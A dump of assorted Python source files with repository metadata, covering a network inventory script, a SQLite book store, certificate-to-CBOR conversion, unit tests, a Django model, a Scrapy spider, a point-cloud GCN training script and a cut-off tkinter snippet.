max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
sa/profiles/Alcatel/AOS/get_inventory.py | prorevizor/noc | 84 | 16900 | <filename>sa/profiles/Alcatel/AOS/get_inventory.py
# ----------------------------------------------------------------------
# Alcatel.AOS.get_inventory
# ----------------------------------------------------------------------
# Copyright (C) 2007-2014 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Alcatel.AOS.get_inventory"
interface = IGetInventory
rx_ni = re.compile(
r"^\s+GBIC\s+(?P<int_number>\d+)\n"
r"\s+Manufacturer Name:\s+(?P<vendor>\S+)(|\s+),\n"
r"^\s+Part Number:\s+(?P<part_number>\S+)(|\s+),\n"
r"^\s+Hardware Revision:\s+(|(?P<hw_rev>\S+))(|\s+),\n"
r"^\s+Serial Number:\s+(?P<serial>\S+)(|\s+)(|\s+),\n",
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
def execute(self):
objects = []
# Chassis info
p = self.scripts.get_version()
objects += [
{
"type": "CHASSIS",
"number": None,
"vendor": "ALU",
"serial": p["attributes"].get("Serial Number"),
"description": "%s %s" % (p["vendor"], p["platform"]),
"part_no": p["platform"],
"revision": p["attributes"].get("HW version"),
"builtin": False,
}
]
# Transiver Detected
iface = self.cli("show ni")
for match in self.rx_ni.finditer(iface):
number = match.group("int_number")
# type = match.group("int")
# vendor = match.group("vendor")
serial = match.group("serial")
hw_rev = match.group("hw_rev")
if not hw_rev:
hw_rev = "None"
part_no = match.group("part_number")
if "XFP-10G-LR" in part_no:
part = "NoName | Transceiver | 10G | XFP LR"
elif "SFP-LX" in part_no:
part = "NoName | Transceiver | 1G | SFP LX"
elif "SFP-LH" in part_no:
part = "NoName | Transceiver | 1G | SFP LH"
elif "GLC-BX" in part_no:
part = "Cisco | Transceiver | 1G | GLC-BX-D"
else:
part = "NoName | Transceiver | 1G | SFP SX"
objects += [
{
"type": "XCVR",
"number": number,
"vendor": "NONAME",
"serial": serial,
"description": "SFP Transceiver " + part_no,
"part_no": [part],
"revision": hw_rev,
"builtin": False,
}
]
return objects
| 2.15625 | 2 |
db_conn.py | achhetr/Library-book-store-app | 0 | 16901 | import sqlite3
class Database:
# create book always if not exists
def __init__(self,db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.execute("CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, " +
"title TEXT, author TEXT, year INTEGER, isbn INTEGER)")
self.conn.commit()
def insert(self,title,author,year,isbn):
self.cur.execute("INSERT INTO book VALUES (NULL,?,?,?,?)",(title,author,year,isbn))
self.conn.commit()
def view(self):
self.cur.execute("SELECT * FROM book")
rows = self.cur.fetchall()
return rows
def search(self,title="",author="",year="",isbn=""):
self.cur.execute("SELECT * FROM book WHERE title=? OR author=? " +
"OR year=? OR isbn=?",(title,author,year,isbn))
rows = self.cur.fetchall()
return rows
def delete(self,id):
self.cur.execute("DELETE FROM book WHERE id=?",(id,))
self.conn.commit()
def update(self,id,title,author,year,isbn):
self.cur.execute("UPDATE book SET title=?, author=?, " +
"year=?,isbn=? WHERE id=?", (title,author,year,isbn,id))
self.conn.commit()
def __del__(self):
self.conn.close() | 4 | 4 |
edge-tool/cbor_converter.py | hckim-kornic/mbed-edge-kornic | 0 | 16902 | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
'arm_uc_default_certificate')
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY')
UPDATE_KEYS = ('arm_uc_default_certificate',
'arm_uc_class_id',
'arm_uc_vendor_id')
KEY_MAP = {
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
'arm_uc_class_id': 'mbed.ClassId',
'arm_uc_vendor_id': 'mbed.VendorId'
}
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
def __init__(self, development_certificate, update_resource, cbor_file):
self.development_certificate = development_certificate
self.update_resource = update_resource
self.cbor_file = cbor_file
def __check_file_exists(self, path):
if not os.path.isfile(path):
print("File '%s' does not exist.")
return False
return True
def parse_c_file(self):
if not self.__check_file_exists(self.development_certificate) or \
not self.__check_file_exists(self.update_resource):
return None
values = {}
values.update(CParser([self.development_certificate]).defs.get('values'))
values.update(CParser([self.update_resource],
macros={
'MBED_CLOUD_DEV_UPDATE_ID' : 1,
'MBED_CLOUD_DEV_UPDATE_CERT' : 1
}).defs.get('values'))
return values
def create_cbor_data(self, vars):
cbor_data = {'Certificates': [],
'Keys' : [],
'ConfigParams': [],
'SchemeVersion': '0.0.1'}
use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
cbor_data['ConfigParams'].append(ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
for key in vars.keys():
var = vars.get(key)
cbor_var_key = KEY_MAP.get(key, None)
if cbor_var_key:
if key in CERTIFICATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
cbor_data['Certificates'].append(certificate)
elif key in KEY_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
cbor_data['Keys'].append(private_key)
elif key in UPDATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var)
config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
config_param = ConfigParam(var, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
print("Key %s not in KEY_MAP." % key)
return cbor_data
def convert_to_cbor(self):
vars = self.parse_c_file()
if not vars:
print("No variables parsed.")
else:
cbor_data = self.create_cbor_data(vars)
with open(self.cbor_file, 'wb') as out_file:
cbor2.dump(cbor_data, out_file)
| 1.632813 | 2 |
turbinia/processors/archive_test.py | sa3eed3ed/turbinia | 559 | 16903 | <filename>turbinia/processors/archive_test.py
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
"""Tests for Archive Processor."""
def setUp(self):
# Setup testing directories/variables.
self.test_files = []
self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
if not os.path.exists(self.tmp_files_dir):
os.makedirs(self.tmp_files_dir)
# Generate text files containing random numbers.
file_max = 10
counter = 0
while counter <= file_max:
file_name = 'file{0:s}.txt'.format(str(counter))
file_path = os.path.join(self.tmp_files_dir, file_name)
file_open = open(file_path, 'w+')
rand_nums = [randint(0, 1000) for i in range(50)]
for i in rand_nums:
file_open.write('%s\n' % str(i))
file_open.close()
counter += 1
self.test_files.append(file_name)
archive.CompressDirectory(self.tmp_files_dir)
def tearDown(self):
# Remove testing directory for this unit test.
if os.path.exists(self.base_output_dir):
rmtree(self.base_output_dir)
def test_compressed_dir(self):
"""Tests the compression function"""
# Check if compressed directory matches expected output path.
self.assertEqual(
archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
# Check to confirm that the archive is gzip format.
self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
# Raise assertion if folder does not exist.
with self.assertRaises(TurbiniaException):
archive.CompressDirectory('blah')
def test_validate_tarfile(self):
"""Tests the validate function used to decompress tar files"""
# Raise exception for file that does not exist.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile('blah.no')
# Raise exception for a file with unsupported extension.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
| 2.375 | 2 |
blog.py | BenTimor/SerializationConceptSystem | 1 | 16904 | <reponame>BenTimor/SerializationConceptSystem<gh_stars>1-10
from utils import database
class Config:
config = None
def __init__(self, users, posts, comments):
self.users = users
self.posts = posts
self.comments = comments
Config.config = self
@staticmethod
def update():
database["concept", True]["config", "WHERE id=1"] = Config.config
@staticmethod
def setup():
try:
Config.config = database["concept", True]["config", "WHERE id=1"][0][0]
except:
Config.config = Config([User("Admin", "admin123", True)], [Post("Admin", 0, "Hello World!", "Lorem Ipsum")], {0: [Comment("Admin", "Lorem Ipsum")]})
database["concept", True]["config"] = Config.config
class User:
def __init__(self, name, password, is_admin=False):
self.name = name
self.is_admin = is_admin
self.password = password
@staticmethod
def new_user(name, password, is_admin=False):
Config.config.users.append(User(name, password, is_admin))
Config.update()
@staticmethod
def get_user(name):
for user in Config.config.users:
if user.name == name:
return user
class Post:
def __init__(self, user, id, title, content):
self.user = user
self.id = id
self.title = title
self.content = content
@staticmethod
def new_post(user, title, content):
Config.config.posts.append(Post(user, len(Config.config.posts), title, content))
Config.update()
class Comment:
def __init__(self, user, content):
self.user = user
self.content = content
@staticmethod
def new_comment(post, user, content):
if not Config.config.comments[post]:
Config.config.comments[post] = []
Config.config.comments[post].append(Comment(user, content))
Config.update() | 2.796875 | 3 |
src/svr/tests/__init__.py | yottaawesome/fsnd-project-2 | 3 | 16905 | from .test_db import TestDal
| 1.023438 | 1 |
Owner/models.py | 2000090063/Vehicle_Rental_System-SDP-2- | 3 | 16906 | from django.db import models
# Create your models here.
class Owner(models.Model):
Owner_id = models.AutoField
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license) | 2.328125 | 2 |
tectosaur/fmm/builder.py | jlmaurer/tectosaur | 17 | 16907 | import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
| 2.078125 | 2 |
fabio/test/codecs/test_mpaimage.py | picca/fabio | 0 | 16908 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: <NAME> (<EMAIL>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
class TestMpa(unittest.TestCase):
"""
Test classe for multiwire (mpa) images
"""
TESTIMAGES = [
# filename dim1 dim2 min max mean stddev
("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
]
def test_read(self):
"""
Test the reading of multiwire images
"""
for imageData in self.TESTIMAGES:
name, dim1, dim2, mini, maxi, mean, stddev = imageData
shape = dim2, dim1
logger.debug("Processing: %s" % name)
path = UtilsTest.getimage(name + ".bz2")[:-4]
obj = fabio.mpaimage.MpaImage()
obj.read(path)
self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
self.assertEqual(shape, obj.shape)
def suite():
loadTests = unittest.defaultTestLoader.loadTestsFromTestCase
testsuite = unittest.TestSuite()
testsuite.addTest(loadTests(TestMpa))
return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| 2.3125 | 2 |
currencySpider.py | cloud322/helloScrap | 0 | 16909 | # -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
#리눅스상에서 utf-8 로 파일에 내용을 기록하려면 시스템 기본 인코딩으 ㄹutf-8 로 설정해야함
reload(sys)
sys.setdefaultencoding('utf8')
# scrapy 에서 spider 는 crawling/scrapping을 담당하는 핵심부분
#crawling/scrapping 절차에 대한 정의를 하는 부분
class CurrSpider(scrapy.Spider):
name = 'currSpider'
start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']
def parse(self, response):
ranks = response.css('span.blind::text').extract()
titles = response.css('span.value::text').extract()
with codecs.open('curr.csv','w','utf-8') as f:
# 처리결과 저장하기위해
# movierank.csv 라는 이름으로 쓰기 모드로 open
# for i in range(0,4):
# rank = ranks[i].replace('\r\n', ' ')
# rank = ''.join(rank.split())
print(ranks)
# title = titles[i].replace('\r\n', ' ')
# title = title.strip().encode('utf-8')
print(titles)
f.write('%s,%s\n' % (ranks, titles))
f.close() | 2.828125 | 3 |
tests/test_sanity_check/test_similar_columns.py | thibaultbl/feature_engine | 1 | 16910 | <reponame>thibaultbl/feature_engine<gh_stars>1-10
import numpy as np
import pandas as pd
from feature_engine.sanity_check import SimilarColumns
def test_similar_columns_when_more_columns_in_train_than_test(
df_vartypes, df_na
):
# When columns are the same
train = df_na.copy()
test = df_vartypes.copy()
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", "jack"],
"City": ["London", "Manchester", "Liverpool", "Bristol"],
"Studies": [np.nan, np.nan, np.nan, np.nan],
"Age": [20, 21, 19, 18],
"Marks": [0.9, 0.8, 0.7, 0.6],
"dob": pd.date_range("2020-02-24", periods=4, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
def test_similar_columns_when_more_columns_in_test_than_train(
df_vartypes, df_na
):
# When columns are the same
train = df_vartypes
test = df_na
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", np.nan, "peter", np.nan, "fred", "sam"],
"City": [
"London",
"Manchester",
np.nan,
np.nan,
"London",
"London",
"Bristol",
"Manchester",
],
"Age": [20, 21, 19, np.nan, 23, 40, 41, 37],
"Marks": [0.9, 0.8, 0.7, np.nan, 0.3, np.nan, 0.8, 0.6],
"dob": pd.date_range("2020-02-24", periods=8, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
| 2.828125 | 3 |
examples/sem_seg_dense/train.py | megaelius/deep_gcns_torch | 0 | 16911 |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
opt.losses.reset()
model.train()
with tqdm(train_loader) as tqdm_loader:
for i, data in enumerate(tqdm_loader):
opt.iter += 1
desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
.format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
tqdm_loader.set_description(desc)
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y.to(opt.device)
# ------------------ zero, output, loss
optimizer.zero_grad()
out = model(inputs)
loss = criterion(out, gt)
# ------------------ optimization
loss.backward()
optimizer.step()
opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
Is = np.empty((len(loader), opt.n_classes))
Us = np.empty((len(loader), opt.n_classes))
model.eval()
with torch.no_grad():
for i, data in enumerate(tqdm(loader)):
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y
out = model(inputs)
pred = out.max(dim=1)[1]
pred_np = pred.cpu().numpy()
target_np = gt.cpu().numpy()
for cl in range(opt.n_classes):
cur_gt_mask = (target_np == cl)
cur_pred_mask = (pred_np == cl)
I = np.sum(np.logical_and(cur_pred_mask, cur_gt_mask), dtype=np.float32)
U = np.sum(np.logical_or(cur_pred_mask, cur_gt_mask), dtype=np.float32)
Is[i, cl] = I
Us[i, cl] = U
ious = np.divide(np.sum(Is, 0), np.sum(Us, 0))
ious[np.isnan(ious)] = 1
iou = np.mean(ious)
if opt.phase == 'test':
for cl in range(opt.n_classes):
logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
opt.test_value = iou
logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
def epochs(opt):
logging.info('===> Creating dataloader ...')
train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
opt.n_classes = train_loader.dataset.num_classes
cur_rank = comm.get_local_rank()
logging.info('===> Loading the network ...')
model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)
logging.info('===> loading pre-trained ...')
model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
logging.info(model)
logging.info('===> Init the optimizer ...')
criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)
logging.info('===> Init Metric ...')
opt.losses = AverageMeter()
opt.test_value = 0.
logging.info('===> start training ...')
for _ in range(opt.epoch, opt.total_epochs):
opt.epoch += 1
train_sampler.set_epoch(opt.epoch)
test_sampler.set_epoch(opt.epoch)
logging.info('Epoch:{}'.format(opt.epoch))
train(model, train_loader, optimizer, criterion, opt, cur_rank)
if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
test(model, test_loader, opt, cur_rank)
scheduler.step()
if comm.is_main_process():
# ------------------ save checkpoints
# min or max. based on the metrics
is_best = (opt.test_value < opt.best_value)
opt.best_value = max(opt.test_value, opt.best_value)
model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
save_checkpoint({
'epoch': opt.epoch,
'state_dict': model_cpu,
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
'best_value': opt.best_value,
}, is_best, opt.ckpt_dir, opt.exp_name)
# ------------------ tensorboard log
info = {
'loss': opt.losses.avg,
'test_value': opt.test_value,
'lr': scheduler.get_lr()[0]
}
writer.add_scalar('Train Loss', info['loss'], opt.epoch)
writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
writer.add_scalar('lr', info['lr'], opt.epoch)
logging.info('Saving the final model.Finish!')
def hola():
print('Hola')
def main():
opt = OptInit().get_args()
'''
This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
creates n_gpus processes and launches epochs function on each of them.
'''
launch(
epochs,
num_gpus_per_machine=opt.n_gpus,
num_machines=1,
machine_rank=0,
dist_url='auto',
args=(opt,)
)
#epochs(opt)
if __name__ == '__main__':
main() | 1.9375 | 2 |
sources/tkinter/prog03.py | kantel/pythoncuriosa | 0 | 16912 | import tkinter as tk
from tkinter import ttk
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")
a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)
def clickMe():
action.configure(text = "Hallöchen " + name.get())
name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
